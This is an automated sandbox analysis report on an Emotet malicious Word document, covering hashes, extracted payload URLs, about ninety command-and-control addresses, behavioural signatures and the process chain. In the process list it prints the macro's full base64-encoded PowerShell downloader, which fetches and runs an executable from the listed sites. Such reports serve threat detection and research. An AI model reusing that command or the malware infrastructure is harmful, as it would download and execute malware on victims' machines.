Analysis
-
max time kernel
69s -
max time network
145s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
27-08-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd_2020-08-27__200808._doc.doc
Resource
win7v200722
General
-
Target
emotet_e2_7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd_2020-08-27__200808._doc.doc
-
Size
218KB
-
MD5
a7bd894680e439fd8753e29b79cd2de2
-
SHA1
a4ef376a566225ba782d25ca5ea68f0e63b23826
-
SHA256
7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd
-
SHA512
224ac475a964c3dd60ca662c5324c753fd33208fd0b6c468bf6993f63b6a5e9a4b886c6bcf7952b0f6bcbd0213b3cf3ec8242834c70f4f095fc4862221502bf3
Malware Config
Extracted
http://somosdrucken.com/upload/GGQL96W/
http://www.vedigitize.com/wp-includes/l9K6YJ/
http://www.sosyalben.org/hpKTnb/
http://www.sutomoresmestaj.net/menu/E/
http://www.traveltoharamain.com/cgi-bin/b/
http://www.thinkdesign4u.com/css/Rtc1/
https://www.mwk-bionik.de/fileadmin/vOJ/
Extracted
emotet
172.91.208.86:80
45.55.36.51:443
91.83.93.99:7080
45.55.219.163:443
107.5.122.110:80
103.86.49.11:8080
85.105.205.77:8080
120.150.60.189:80
137.59.187.107:8080
139.59.60.244:8080
203.117.253.142:80
1.221.254.82:80
97.82.79.83:80
37.187.72.193:8080
139.99.158.11:443
152.168.248.128:443
74.208.45.104:8080
83.169.36.251:8080
169.239.182.217:8080
216.208.76.186:80
209.141.54.221:8080
78.24.219.147:8080
104.131.44.150:8080
68.171.118.7:80
137.119.36.33:80
109.74.5.95:8080
84.39.182.7:80
157.147.76.151:80
95.179.229.244:8080
174.102.48.180:443
194.187.133.160:443
201.173.217.124:443
187.161.206.24:80
70.121.172.89:80
61.19.246.238:443
181.230.116.163:80
47.146.117.214:80
112.185.64.233:80
174.45.13.118:80
85.66.181.138:80
189.212.199.126:443
190.160.53.126:80
46.105.131.79:8080
173.81.218.65:80
24.179.13.119:80
37.139.21.175:8080
87.106.139.101:8080
110.145.77.103:80
200.41.121.90:80
185.94.252.104:443
104.131.11.150:443
157.245.99.39:8080
37.70.8.161:80
167.86.90.214:8080
153.232.188.106:80
121.124.124.40:7080
5.196.74.210:8080
113.160.130.116:8443
87.106.136.232:8080
41.60.200.34:80
74.120.55.163:80
24.43.99.75:80
95.213.236.64:8080
98.109.204.230:80
204.197.146.48:80
62.75.141.82:80
68.188.112.97:80
203.153.216.189:7080
91.211.88.52:7080
24.137.76.62:80
75.139.38.211:80
168.235.67.138:7080
190.55.181.54:443
67.205.85.243:8080
94.200.114.161:80
139.162.108.71:8080
47.144.21.12:443
104.236.246.93:8080
5.39.91.110:7080
69.30.203.214:8080
74.109.108.202:80
176.111.60.55:8080
139.130.242.43:80
94.23.237.171:443
174.137.65.18:80
85.152.162.105:80
93.147.212.206:80
200.114.213.233:8080
180.92.239.110:8080
173.62.217.22:443
62.30.7.67:443
79.98.24.39:8080
188.219.31.12:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1544 1824 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 6 1544 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
N3tnr9z.exeodbctrac.exepid process 1344 N3tnr9z.exe 296 odbctrac.exe -
Drops file in System32 directory 2 IoCs
Processes:
powersheLL.exeN3tnr9z.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe File opened for modification C:\Windows\SysWOW64\SSShim\odbctrac.exe N3tnr9z.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\TypeLib\{9DD4D1A5-5453-4CD9-98D9-9C3AED06661F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9DD4D1A5-5453-4CD9-98D9-9C3AED06661F}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9DD4D1A5-5453-4CD9-98D9-9C3AED06661F}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\TypeLib\{9DD4D1A5-5453-4CD9-98D9-9C3AED06661F}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9DD4D1A5-5453-4CD9-98D9-9C3AED06661F}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1036 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powersheLL.exeodbctrac.exepid process 1544 powersheLL.exe 1544 powersheLL.exe 296 odbctrac.exe 296 odbctrac.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1544 powersheLL.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXEN3tnr9z.exeodbctrac.exepid process 1036 WINWORD.EXE 1036 WINWORD.EXE 1344 N3tnr9z.exe 1344 N3tnr9z.exe 296 odbctrac.exe 296 odbctrac.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
powersheLL.exeN3tnr9z.exedescription pid process target process PID 1544 wrote to memory of 1344 1544 powersheLL.exe N3tnr9z.exe PID 1544 wrote to memory of 1344 1544 powersheLL.exe N3tnr9z.exe PID 1544 wrote to memory of 1344 1544 powersheLL.exe N3tnr9z.exe PID 1544 wrote to memory of 1344 1544 powersheLL.exe N3tnr9z.exe PID 1344 wrote to memory of 296 1344 N3tnr9z.exe odbctrac.exe PID 1344 wrote to memory of 296 1344 N3tnr9z.exe odbctrac.exe PID 1344 wrote to memory of 296 1344 N3tnr9z.exe odbctrac.exe PID 1344 wrote to memory of 296 1344 N3tnr9z.exe odbctrac.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_7b6977d2fea5ace224c2e46488cf144b41a82f88c0d6d7849472cba5bb54eecd_2020-08-27__200808._doc.doc"Modifies registry classSuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABJAGIAOQBqADAAYgB4AD0AKAAnAE0AbAAnACsAKAAnAGgAbQAxACcAKwAnADEAagAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdABlAG0AcABcAFcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQBSAEUAQwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAHUAcgBJAFQAYAB5AHAAUgBgAE8AVABgAG8AQwBvAEwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAJwArACgAJwAxACcAKwAnADIALAAgACcAKQArACcAdAAnACsAKAAnAGwAJwArACcAcwAxADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQATQByAGgAZQBkAGMAegAgAD0AIAAoACcATgAzACcAKwAnAHQAbgAnACsAKAAnAHIAOQAnACsAJwB6ACcAKQApADsAJABaAHIAdwByAHMAZwBsAD0AKAAoACcARgBmACcAKwAnAGQAcAAnACkAKwAnAHAAbQAnACsAJwBkACcAKQA7ACQATwAxAHAAcgA3ADMAcgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBYAGkAJwArACcAcQAnACkAKwAoACcAdwAnACsAJwBvAHIAZABYAGkAJwApACsAKAAnAHEAJwArACcAMgAwACcAKQArACgAJwAxADkAWABpACcAKwAnAHEAJwApACkALgAiAFIARQBwAGwAYABBAGMARQAiACgAKAAnAFgAaQAnACsAJwBxACcAKQAsACcAXAAnACkAKQArACQATQByAGgAZQBkAGMAegArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEIAMAAwAHYAdgBlAGwAPQAoACcARgA4ACcAKwAnAHcAJwArACgAJwBtAHUAbQAnACsAJwA3ACcAKQApADsAJABSAGQANQBjAGMAOABwAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABVAHAAcwBkADkAegBsAD0AKAAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAnACsAJwAvACcAKwAnAC8AcwBvACcAKwAnAG0AbwBzAGQAcgB1AGMAJwApACsAJwBrACcAKwAnAGUAbgAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAdQBwAGwAbwAnACsAJwBhAGQAJwApACsAJwAvACcAKwAnAEcAJwArACgAJwBHAFEATAA5ACcAKwAnADYAJwArACcAVwAnACkAKwAoACcALwAqACcAKwAnAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwB3AHcAdwAuAHYAZQAnACsAJwBkACcAKwAnAGkAJwApACsAJwBnACcAKwAoACcAaQB0ACcAKwAnAGkAJwApACsAKAAnAHoAZQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKwAnAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwBsACcAKQArACgAJwA5ACcAKwAnAEsANgAnACkAKwAoACcAWQAnACsAJwBKAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAAnACkAKwAnADoALwAnACsAJwAvAHcAJwArACgAJwB3AHcALgBzACcAKwAnAG8AJwApACsAKAAnAHMAJwArACcAeQBhAGwAYgAnACkAKwAoACcAZQAnACsAJwBuAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwApACsAJwBoACcAKwAoACcAcABLACcAKwAnAFQAbgBiACcAKQArACgAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwB3AHcAJwArACcAdwAnACkAKwAoACcALgBzAHUAdAAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAG8AJwArACcAcgBlAHMAJwApACsAKAAnAG0AZQBzAHQAYQBqAC4AbgAnACsAJwBlACcAKwAnAHQALwBtAGUAJwArACcAbgB1ACcAKwAnAC8ARQAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAvACcAKwAnAHcAJwApACsAJwB3AHcAJwArACcALgB0ACcAKwAoACcAcgBhAHYAZQAnACsAJwBsAHQAbwBoAGEAcgAnACsAJwBhAG0AJwArACcAYQBpAG4ALgAnACkAKwAoACcAYwBvAG0AJwArACcALwBjACcAKQArACcAZwAnACsAKAAnAGkAJwArACcALQBiAGkAJwApACsAJwBuACcAKwAoACcALwAnACsAJwBiAC8AKgBoACcAKQArACgAJwB0AHQAcAA6AC8AJwArACcALwAnACsAJwB3AHcAJwApACsAKAAnAHcAJwArACcALgB0ACcAKwAnAGgAaQBuACcAKQArACgAJwBrAGQAJwArACcAZQBzACcAKQArACgAJwBpACcAKwAnAGcAbgA0AHUALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAYwAnACsAKAAnAHMAcwAnACsAJwAvAFIAdAAnACkAKwAoACcAYwAxACcAKwAnAC8AKgBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAvAHcAJwApACsAKAAnAHcAJwArACcAdwAuAG0AJwApACsAKAAnAHcAawAtAGIAaQAnACsAJwBvACcAKwAnAG4AaQAnACkAKwAnAGsAJwArACgAJwAuACcAKwAnAGQAZQAvAGYAaQAnACsAJwBsAGUAYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAvAHYATwAnACsAJwBKAC8AJwApACkALgAiAFMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgA5AGsAcwBwAGcAMAA9ACgAKAAnAFoAMgAnACsAJwBlACcAKQArACcAdgAnACsAKAAnAHgAJwArACcANQA3ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQATgA4AHIAcABxAG4AdgAgAGkAbgAgACQAVQBwAHMAZAA5AHoAbAApAHsAdAByAHkAewAkAFIAZAA1AGMAYwA4AHAALgAiAGQATwB3AGAATgBsAE8AQQBgAGQAZgBpAGwARQAiACgAJABOADgAcgBwAHEAbgB2ACwAIAAkAE8AMQBwAHIANwAzAHIAKQA7ACQAUgBhAGwAcwAwAGUAcAA9ACgAJwBFACcAKwAnADcAagAnACsAKAAnAHcAdgBfACcAKwAnADcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQATwAxAHAAcgA3ADMAcgApAC4AIgBsAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADMANwA1ADYANAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABPADEAcAByADcAMwByACkAOwAkAFMAYgByAGIAdwBkADgAPQAoACgAJwBSAHYANQBfACcAKwAnADEAJwApACsAJwBlACcAKwAnAG8AJwApADsAYgByAGUAYQBrADsAJABMAHkAdQBiAG4AcABqAD0AKAAoACcATABtACcAKwAnAHQAOQAnACkAKwAnAG0AJwArACcAMgBfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBsADgANABvAGYAYgA9ACgAKAAnAEsAcgBsACcAKwAnAHQAJwApACsAKAAnAHYANgAnACsAJwBwACcAKQApAA==Process spawned unexpected child processBlacklisted process makes network requestDrops file in System32 directorySuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\word\2019\N3tnr9z.exe"C:\Users\Admin\AppData\Local\Temp\word\2019\N3tnr9z.exe"Executes dropped EXEDrops file in System32 directorySuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SSShim\odbctrac.exe"C:\Windows\SysWOW64\SSShim\odbctrac.exe"Executes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix
Replay Monitor
Downloads
-
C:\Users\Admin\AppData\Local\Temp\WorD\2019\N3tnr9z.exe
-
C:\Users\Admin\AppData\Local\Temp\word\2019\n3tnr9z.exe
-
C:\Windows\SysWOW64\SSShim\odbctrac.exe
-
memory/296-19-0x0000000000000000-mapping.dmp
-
memory/944-22-0x000007FEF7170000-0x000007FEF73EA000-memory.dmpFilesize
2MB
-
memory/1036-3-0x0000000006E70000-0x0000000007070000-memory.dmpFilesize
2MB
-
memory/1036-4-0x0000000006E70000-0x0000000007070000-memory.dmpFilesize
2MB
-
memory/1036-6-0x000000000AF10000-0x000000000AF14000-memory.dmpFilesize
16KB
-
memory/1036-2-0x0000000008B10000-0x0000000008B14000-memory.dmpFilesize
16KB
-
memory/1344-15-0x0000000000000000-mapping.dmp
-
memory/1344-17-0x0000000000260000-0x000000000026C000-memory.dmpFilesize
48KB
-
memory/1544-8-0x000007FEEA440000-0x000007FEEAE2C000-memory.dmpFilesize
9MB
-
memory/1544-14-0x000000001C560000-0x000000001C561000-memory.dmpFilesize
4KB
-
memory/1544-13-0x000000001ADB0000-0x000000001ADB1000-memory.dmpFilesize
4KB
-
memory/1544-12-0x00000000022F0000-0x00000000022F1000-memory.dmpFilesize
4KB
-
memory/1544-11-0x00000000025E0000-0x00000000025E1000-memory.dmpFilesize
4KB
-
memory/1544-10-0x000000001AEF0000-0x000000001AEF1000-memory.dmpFilesize
4KB
-
memory/1544-9-0x0000000002390000-0x0000000002391000-memory.dmpFilesize
4KB